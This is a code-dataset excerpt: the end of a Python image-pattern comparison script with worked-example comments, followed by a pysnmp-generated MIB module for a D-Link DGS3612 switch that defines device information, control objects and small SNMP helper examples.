comb_layers = [comb_layers + sublayers for comb_layers, sublayers in
zip_longest(comb_layers, P['sublayers'], fillvalue=[])]
return comb_layers
def intra_Pd_(Pd_, rel_adj_M, rdn, rng): # evaluate for sub-recursion in line P_, packing results in sub_P_
comb_layers = []
for P in Pd_: # each sub in sub_ is nested to depth = sub_[n]
if min(abs(P['D']), abs(P['D']) * rel_adj_M) > ave_D * rdn and P['L'] > 3: # abs(D) * rel_adj_M: allocated adj_M
# cross-comp of ds:
ddert_ = deriv_comp(P['dert_']) # i is d
sub_Pm_ = form_P_(ddert_, rdn+1, rng+1, fPd=True) # cluster Pd derts by md sign, eval intra_Pm_(Pdm_), won't happen
Ls = len(sub_Pm_)
# 1st layer: Ls, fPd, fid, rdn, rng, sub_P_:
P['sublayers'] += [[(Ls, True, True, rdn, rng, sub_Pm_ )]]
if len(sub_Pm_) > 3:
P['sublayers'] += intra_Pm_(sub_Pm_, rdn+1 + 1/Ls, rng + 1, fPd=True)
# splice sublayers across sub_Ps:
comb_layers = [comb_layers + sublayers for comb_layers, sublayers in
zip_longest(comb_layers, P['sublayers'], fillvalue=[])]
'''
adj_M is not affected by primary range_comp per Pm?
no comb_m = comb_M / comb_S, if fid: comb_m -= comb_|D| / comb_S: alt rep cost
same-sign comp: parallel edges, cross-sign comp: M - (~M/2 * rL) -> contrast as 1D difference?
'''
return comb_layers
def form_adjacent_M_(Pm_): # compute array of adjacent Ms, for contrastive borrow evaluation
'''
Value is projected match, while variation has contrast value only: it matters to the extent that it interrupts adjacent match: adj_M.
    In noise there is a lot of variation, but no adjacent match to cancel, so that variation has no predictive value.
On the other hand, we may have a 2D outline or 1D contrast with low gradient / difference, but it terminates some high-match area.
Contrast is salient to the extent that it can borrow sufficient predictive value from adjacent high-match area.
'''
M_ = [Pm['M'] for Pm in Pm_] # list of Ms in the order of Pm_
adj_M_ = [(abs(prev_M) + abs(next_M)) / 2
for prev_M, next_M in zip(M_[:-2], M_[2:])] # adjacent Ms, first and last Ms
adj_M_ = [M_[1]] + adj_M_ + [M_[-2]] # sum previous and next adjacent Ms
''' expanded:
pri_M = Pm_[0].M # deriv_comp value is borrowed from adjacent opposite-sign Ms
M = Pm_[1].M
adj_M_ = [abs(Pm_[1].M)] # initial next_M, also projected as prior for first P
for Pm in Pm_[2:]:
next_M = Pm.M
adj_M_.append((abs(pri_M / 2) + abs(next_M / 2))) # exclude M
pri_M = M
M = next_M
adj_M_.append(abs(pri_M)) # no / 2: projection for last P
'''
return adj_M_
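# Worked example for form_adjacent_M_ (Ms hypothetical):
#   M_ = [5, -3, 4, 2]
#   middle pairs from zip(M_[:-2], M_[2:]): [(|5|+|4|)/2, (|-3|+|2|)/2] = [4.5, 2.5]
#   adj_M_ = [M_[1]] + [4.5, 2.5] + [M_[-2]] = [-3, 4.5, 2.5, 4]
# note the first element copies M_[1] without abs(), exactly as written above.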
def range_comp(dert_): # cross-comp of 2**rng- distant pixels: 4,8,16.., skipping intermediate pixels
rdert_ = []
_i = dert_[0]['i']
for dert in dert_[2::2]: # all inputs are sparse, skip odd pixels compared in prior rng: 1 skip / 1 add, to maintain 2x overlap
d = dert['i'] -_i
rp = dert['p'] + _i # intensity accumulated in rng
rd = dert['d'] + d # difference accumulated in rng
rm = dert['m'] + ave - abs(d) # m accumulated in rng
# for consistency with deriv_comp, else m is redundant
rdert_.append({'i':dert['i'],'p':rp,'d':rd,'m':rm})
_i = dert['i']
return rdert_
def deriv_comp(dert_): # cross-comp consecutive ds in same-sign dert_: sign match is partial d match
# dd and md may match across d sign, but likely in high-match area, spliced by spec in comp_P?
# initialization:
ddert_ = []
_d = abs( dert_[0]['d']) # same-sign in Pd
for dert in dert_[1:]:
# same-sign in Pd
d = abs( dert['d'] )
rd = d + _d
dd = d - _d
md = min(d, _d) - abs( dd/2) - ave_min # min_match because magnitude of derived vars corresponds to predictive value
ddert_.append({'i':dert['d'],'p':rd,'d':dd,'m':md})
_d = d
return ddert_
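# Worked example for deriv_comp (ds hypothetical, ave_min = 2):
#   _d = |3|, d = |5| -> rd = 8, dd = 2, md = min(3, 5) - |2/2| - 2 = 0
# md > 0 only when consecutive |d|s are close in magnitude: a stable gradient.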
def splice_P_(P_, fPd):
'''
Initial P separation is determined by pixel-level sign change, but resulting opposite-sign pattern may be relatively weak,
and same-sign patterns it separates relatively strong.
Another criterion to re-evaluate separation is similarity of defining param: M/L for Pm, D/L for Pd, among the three Ps
If relative proximity * relative similarity > merge_ave: all three Ps should be merged into one.
'''
new_P_ = []
while len(P_) > 2: # at least 3 Ps
__P = P_.pop(0)
_P = P_.pop(0)
P = P_.pop(0)
if splice_eval(__P, _P, P, fPd) > ave_merge: # no * ave_rM * (1 + _P.L / (__P.L+P.L) / 2): _P.L is not significant
# for debugging
#print('P_'+str(_P.id)+' and P_'+str(P.id)+' are merged into P_'+str(__P.id))
# merge _P and P into __P
for merge_P in [_P, P]:
__P.x0 = min(__P.x0, merge_P.x0)
__P.accum_from(merge_P)
__P.dert_+= merge_P.dert_
# back splicing
__P = splice_P_back(new_P_, __P, fPd)
P_.insert(0, __P) # insert merged __P back into P_ to continue merging
else:
new_P_.append(__P) # append __P to P_ when there is no further merging process for __P
P_.insert(0, P) # insert P back into P_ for the consecutive merging process
P_.insert(0, _P) # insert _P back into P_ for the consecutive merging process
# pack remaining Ps:
if P_: new_P_ += P_
return new_P_
def splice_P_back(new_P_, P, fPd): # P is __P in calling splice_P_
while len(new_P_) > 2: # at least 3 Ps
_P = new_P_.pop()
__P = new_P_.pop()
if splice_eval(__P, _P, P, fPd) > ave_merge: # no * ave_rM * (1 + _P.L / (__P.L+P.L) / 2):
# match projected at distance between P,__P: rM is insignificant
# for debug purpose
#print('P_'+str(_P.id)+' and P_'+str(P.id)+' are backward merged into P_'+str(__P.id))
# merge _P and P into __P
for merge_P in [_P, P]:
__P.x0 = min(__P.x0, merge_P.x0)
__P.accum_from(merge_P)
__P.dert_+= merge_P.dert_
P = __P # also returned
else:
new_P_+= [__P, _P]
break
return P
def splice_eval(__P, _P, P, fPd): # should work for splicing Pps too
'''
For 3 Pms, same-sign P1 and P3, and opposite-sign P2:
relative proximity = abs((M1+M3) / M2)
relative similarity = match (M1/L1, M3/L3) / miss (match (M1/L1, M2/L2) + match (M3/L3, M2/L2)) # both should be negative
'''
if fPd:
proximity = abs((__P.D + P.D) / _P.D) if _P.D != 0 else 0 # prevents /0
__mean=__P.D/__P.L; _mean=_P.D/_P.L; mean=P.D/P.L
else:
proximity = abs((__P.M + P.M) / _P.M) if _P.M != 0 else 0 # prevents /0
__mean=__P.M/__P.L; _mean=_P.M/_P.L; mean=P.M/P.L
m13 = min(mean, __mean) - abs(mean-__mean)/2 # P1 & P3
m12 = min(_mean, __mean) - abs(_mean-__mean)/2 # P1 & P2
m23 = min(_mean, mean) - abs(_mean- mean)/2 # P2 & P3
similarity = m13 / abs( m12 + m23) # both should be negative
merge_value = proximity * similarity
return merge_value
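# Worked example for splice_eval on Pms (values hypothetical):
#   __P: M=10, L=5 -> mean 2;  _P: M=-4, L=2 -> mean -2;  P: M=8, L=4 -> mean 2
#   proximity  = |(10 + 8) / -4| = 4.5
#   m13 = 2, m12 = -4, m23 = -4 -> similarity = 2 / |-8| = 0.25
#   merge_value = 4.5 * 0.25 = 1.125, below ave_merge = 50, so no merge here.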
if __name__ == "__main__":
'''
Parse argument (image)
argument_parser = argparse.ArgumentParser()
argument_parser.add_argument('-i', '--image', help='path to image file', default='.//raccoon.jpg')
arguments = vars(argument_parser.parse_args())
# Read image
image = cv2.imread(arguments['image'], 0).astype(int) # load pix-mapped image
'''
# show image in the same window as a code
image = cv2.imread('../raccoon.jpg', 0).astype(int) # manual load pix-mapped image
assert image is not None, "No image in the path"
render = 0
verbose = 0
if render:
plt.figure();plt.imshow(image, cmap='gray') # show the image below in gray
# for visualization:
with open("frame_of_patterns_2.csv", "w") as csvFile:
write = csv.writer(csvFile, delimiter=",")
fieldnames = ("L=", "I=", "D=", "M=", "x0=")
write.writerow(fieldnames)
start_time = time()
# Main
frame_of_patterns_ = cross_comp(image) # returns Pm__
# from pprint import pprint
# pprint(frame_of_patterns_[0]) # shows 1st layer Pm_ only
fline_PPs = 0
if fline_PPs: # debug line_PPs_draft
from line_PPs_draft import *
frame_PP_ = []
for y, P_ in enumerate(frame_of_patterns_):
PP_ = search(P_)
frame_PP_.append(PP_)
end_time = time() - start_time
print(end_time)
avg_line_length: 45.608069 | max_line_length: 137 | alphanum_fraction: 0.59377

hexsha: 794da01efa2c2ba990c6bfcd983c94b061f32df9 | size: 154,962 | ext: py | lang: Python
max_stars_repo_path: pysnmp-with-texts/DGS3612-L2MGMT-MIB.py | max_stars_repo_name: agustinhenze/mibs.snmplabs.com | max_stars_repo_head_hexsha: 1fc5c07860542b89212f4c8ab807057d9a9206c7 | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: 8 | max_stars_repo_stars_event_min_datetime: 2019-05-09T17:04:00.000Z | max_stars_repo_stars_event_max_datetime: 2021-06-09T06:50:51.000Z
max_issues_repo_path: pysnmp-with-texts/DGS3612-L2MGMT-MIB.py | max_issues_repo_name: agustinhenze/mibs.snmplabs.com | max_issues_repo_head_hexsha: 1fc5c07860542b89212f4c8ab807057d9a9206c7 | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: 4 | max_issues_repo_issues_event_min_datetime: 2019-05-31T16:42:59.000Z | max_issues_repo_issues_event_max_datetime: 2020-01-31T21:57:17.000Z
max_forks_repo_path: pysnmp-with-texts/DGS3612-L2MGMT-MIB.py | max_forks_repo_name: agustinhenze/mibs.snmplabs.com | max_forks_repo_head_hexsha: 1fc5c07860542b89212f4c8ab807057d9a9206c7 | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: 10 | max_forks_repo_forks_event_min_datetime: 2019-04-30T05:51:36.000Z | max_forks_repo_forks_event_max_datetime: 2022-02-16T03:33:41.000Z
content:
#
# PySNMP MIB module DGS3612-L2MGMT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/DGS3612-L2MGMT-MIB
# Produced by pysmi-0.3.4 at Wed May 1 12:46:32 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "SingleValueConstraint", "ValueRangeConstraint")
AgentNotifyLevel, = mibBuilder.importSymbols("DLINK-ID-REC-MIB", "AgentNotifyLevel")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Counter64, TimeTicks, iso, IpAddress, Unsigned32, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, Gauge32, Counter32, ModuleIdentity, Integer32, NotificationType, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "TimeTicks", "iso", "IpAddress", "Unsigned32", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "Gauge32", "Counter32", "ModuleIdentity", "Integer32", "NotificationType", "ObjectIdentity")
TextualConvention, RowStatus, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "RowStatus", "DisplayString")
dgs3612, = mibBuilder.importSymbols("SW36XXPRIMGMT-MIB", "dgs3612")
swL2MgmtMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2))
if mibBuilder.loadTexts: swL2MgmtMIB.setLastUpdated('0007150000Z')
if mibBuilder.loadTexts: swL2MgmtMIB.setOrganization(' ')
if mibBuilder.loadTexts: swL2MgmtMIB.setContactInfo(' ')
if mibBuilder.loadTexts: swL2MgmtMIB.setDescription('The Structure of Layer 2 Network Management Information.')
class MacAddress(OctetString):
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(6, 6)
fixedLength = 6
class VlanId(Integer32):
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 4094)
class PortList(OctetString):
subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(0, 127)
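# A sketch of what these textual conventions constrain (example values hypothetical):
#   MacAddress: exactly 6 octets, e.g. b'\x00\x1b\x11\x22\x33\x44'
#   VlanId:     Integer32 restricted to 1..4094 (0 and 4095 are reserved in 802.1Q)
#   PortList:   octet string of up to 127 octets, conventionally a per-port bitmap.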
swL2DevMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1))
swL2MultiFilter = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 2))
swL2PortMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3))
swL2QOSMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6))
swL2PortSecurityMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7))
swL2TrunkMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 9))
swL2MirrorMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10))
swL2IGMPMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11))
swL2TrafficSegMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 14))
swL2IpLimitedMulticastMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 15))
swL2MgmtMIBTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 16))
swL2VlanMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 17))
swL2dot1vProtocolMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 18))
swL2MulticastRangeMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 19))
swL2LoopDetectMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 20))
swL2DhcpLocalRelayMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 24))
class IANAifMauAutoNegCapBits(TextualConvention, Bits):
reference = '[IEEE802.3], Section 30.6.1.1.5'
description = 'This data type is used as the syntax of the swL2PortAutoNegCapabilityBits, swL2PortAutoNegCapAdvertisedBits, and swL2PortAutoNegCapReceivedBits objects in swL2PortAutoNegTable.'
status = 'current'
namedValues = NamedValues(("bOther", 0), ("b10baseT", 1), ("b10baseTFD", 2), ("b100baseT4", 3), ("b100baseTX", 4), ("b100baseTXFD", 5), ("b100baseT2", 6), ("b100baseT2FD", 7), ("bFdxPause", 8), ("bFdxAPause", 9), ("bFdxSPause", 10), ("bFdxBPause", 11), ("b1000baseX", 12), ("b1000baseXFD", 13), ("b1000baseT", 14), ("b1000baseTFD", 15))
swL2DevInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1))
swDevInfoTotalNumOfPort = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevInfoTotalNumOfPort.setStatus('current')
if mibBuilder.loadTexts: swDevInfoTotalNumOfPort.setDescription('The number of ports within this switch. This value is the sum of the ports within this switch.')
swDevInfoNumOfPortInUse = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevInfoNumOfPortInUse.setStatus('current')
if mibBuilder.loadTexts: swDevInfoNumOfPortInUse.setDescription('The number of ports in this switch connected to the segment or the end stations.')
swDevModuleInfoTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3), )
if mibBuilder.loadTexts: swDevModuleInfoTable.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoTable.setDescription('This table contains the module information.')
swDevModuleInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swDevModuleInfoUnitID"), (0, "DGS3612-L2MGMT-MIB", "swDevModuleInfoModuleID"))
if mibBuilder.loadTexts: swDevModuleInfoEntry.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoEntry.setDescription('A list of management information for each unit in the system.')
swDevModuleInfoUnitID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 12))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevModuleInfoUnitID.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoUnitID.setDescription('This object indicates the specific unit ID in the stacking/chassis table.')
swDevModuleInfoModuleID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 8))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevModuleInfoModuleID.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoModuleID.setDescription('This object indicates the module ID of this unit.')
swDevModuleInfoModuleName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 12))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevModuleInfoModuleName.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoModuleName.setDescription('A textual string containing the name of the module. ')
swDevModuleInfoReversion = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 4))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevModuleInfoReversion.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoReversion.setDescription('A textual string containing reversion of the module.')
swDevModuleInfoSerial = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 9))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevModuleInfoSerial.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoSerial.setDescription('A textual string containing serial of the module.')
swDevModuleInfoDescription = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 3, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevModuleInfoDescription.setStatus('current')
if mibBuilder.loadTexts: swDevModuleInfoDescription.setDescription('A textual string containing a description of the module.')
swDevInfoBootPromVersion = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevInfoBootPromVersion.setStatus('current')
if mibBuilder.loadTexts: swDevInfoBootPromVersion.setDescription('Boot Prom Version.')
swDevInfoFirmwareVersion = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevInfoFirmwareVersion.setStatus('current')
if mibBuilder.loadTexts: swDevInfoFirmwareVersion.setDescription('Firmware version.')
swDevInfoFrontPanelLedStatus = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 1, 6), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swDevInfoFrontPanelLedStatus.setStatus('current')
if mibBuilder.loadTexts: swDevInfoFrontPanelLedStatus.setDescription('This object is a set of system LED indications. The leading octets are the system LEDs: the first LED is the power LED, the second LED is the console LED, and the third LED is the RPS (Redundant Power Supply) LED. The octets that follow are the logical port LEDs (following dot1dBasePort ordering), two bytes per port: the first byte represents the Link/Activity LED and the second byte represents the Speed LED. Link/Activity LED: the most significant bit is used for blink/solid (8 = the LED blinks), and the link status bits indicate 1 = link fail, 2 = link pass. Speed LED: 01 = 10Mbps, 02 = 100Mbps, 03 = 1000Mbps, 04 = 10Gbps; the four remaining bits are currently unused and must be 0.')
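# Illustrative sketch: decoding one port's two LED bytes from the
# swDevInfoFrontPanelLedStatus octet string described above. The MIB text
# leaves the exact width of the leading system-LED block ambiguous, so it is
# a parameter here, and the bit-level reading below follows the description
# literally; treat it as an assumption rather than a verified vendor encoding.
_SPEED_LEDS = {0x01: '10Mbps', 0x02: '100Mbps', 0x03: '1000Mbps', 0x04: '10Gbps'}

def exampleDecodePortLeds(ledStatus, port, systemOctets=2):
    base = systemOctets + (port - 1) * 2           # two bytes per logical port
    linkActivity, speed = ledStatus[base], ledStatus[base + 1]
    return {
        'blinking': bool(linkActivity & 0x80),     # most significant bit: blink
        'link': {1: 'fail', 2: 'pass'}.get(linkActivity & 0x0F, 'unknown'),
        'speed': _SPEED_LEDS.get(speed, 'unknown'),
    }

# e.g. exampleDecodePortLeds(bytes.fromhex('02028203'), port=1)
# -> {'blinking': True, 'link': 'pass', 'speed': '1000Mbps'}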
swL2DevCtrl = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2))
swL2DevCtrlStpState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlStpState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlStpState.setDescription('This object enables or disables the spanning tree algorithm during runtime of the system.')
swL2DevCtrlIGMPSnooping = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlIGMPSnooping.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlIGMPSnooping.setDescription('This object indicates whether the Layer 2 Internet Group Management Protocol (IGMP) capture function is enabled or disabled.')
swL2DevCtrlIGMPSnoopingMcstRTOnly = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlIGMPSnoopingMcstRTOnly.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlIGMPSnoopingMcstRTOnly.setDescription('')
swL2DevCtrlRmonState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlRmonState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlRmonState.setDescription('This object enables or disables RMON.')
swL2DevCtrlCleanAllStatisticCounter = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("normal", 1), ("active", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlCleanAllStatisticCounter.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlCleanAllStatisticCounter.setDescription('When this object is set to active, all of the statistics counters will be cleared. Setting it to normal does nothing.')
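# Illustrative sketch: clearing all statistics counters by writing active(2)
# to the scalar above with an SNMP SET. Host and write community are
# hypothetical placeholders; requires pysnmp and is never called at import.
def exampleClearAllCounters(host='192.0.2.1', community='private'):
    from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
                              ContextData, ObjectType, ObjectIdentity,
                              Integer32, setCmd)
    errorIndication, errorStatus, _, _ = next(setCmd(
        SnmpEngine(), CommunityData(community),
        UdpTransportTarget((host, 161)), ContextData(),
        ObjectType(ObjectIdentity((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 5, 0)),
                   Integer32(2))))                 # active(2) triggers the clear
    if errorIndication or errorStatus:
        raise RuntimeError(str(errorIndication or errorStatus.prettyPrint()))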
swL2DevCtrlVlanIdOfFDBTbl = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 6), VlanId()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlVlanIdOfFDBTbl.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlVlanIdOfFDBTbl.setDescription('Indicates the VLAN ID to which the Dot1dTpFdbTable belongs; the default value is the DEFAULT_VLAN_ID of the system.')
swL2DevCtrlManagementVlanId = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 7), VlanId()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlManagementVlanId.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlManagementVlanId.setDescription('This object controls which VLAN contains the system IP. That VLAN must already have been created.')
swL2MACNotifyState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MACNotifyState.setStatus('current')
if mibBuilder.loadTexts: swL2MACNotifyState.setDescription('This object enables or disables MAC notification.')
swL2MACNotifyHistorySize = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 500))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MACNotifyHistorySize.setStatus('current')
if mibBuilder.loadTexts: swL2MACNotifyHistorySize.setDescription('This object indicates the history size for MAC address variations in the address table. The default value is 1.')
swL2MACNotifyInterval = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MACNotifyInterval.setStatus('current')
if mibBuilder.loadTexts: swL2MACNotifyInterval.setDescription('This object indicates the time interval, in seconds, for triggering the MAC notification message.')
swL2DevCtrlWeb = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 13))
swL2DevCtrlWebState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 13, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlWebState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlWebState.setDescription('This object controls the web status.')
swL2DevCtrlWebTcpPort = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 13, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlWebTcpPort.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlWebTcpPort.setDescription('This object designates the TCP port. When the web function is disabled, this object is not accessible.')
swL2DevCtrlTelnet = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 14))
swL2DevCtrlTelnetState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 14, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlTelnetState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlTelnetState.setDescription('This object controls the Telnet status.')
swL2DevCtrlTelnetTcpPort = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 14, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlTelnetTcpPort.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlTelnetTcpPort.setDescription('This object designates the TCP port. When Telnet is disabled, this object is not accessible.')
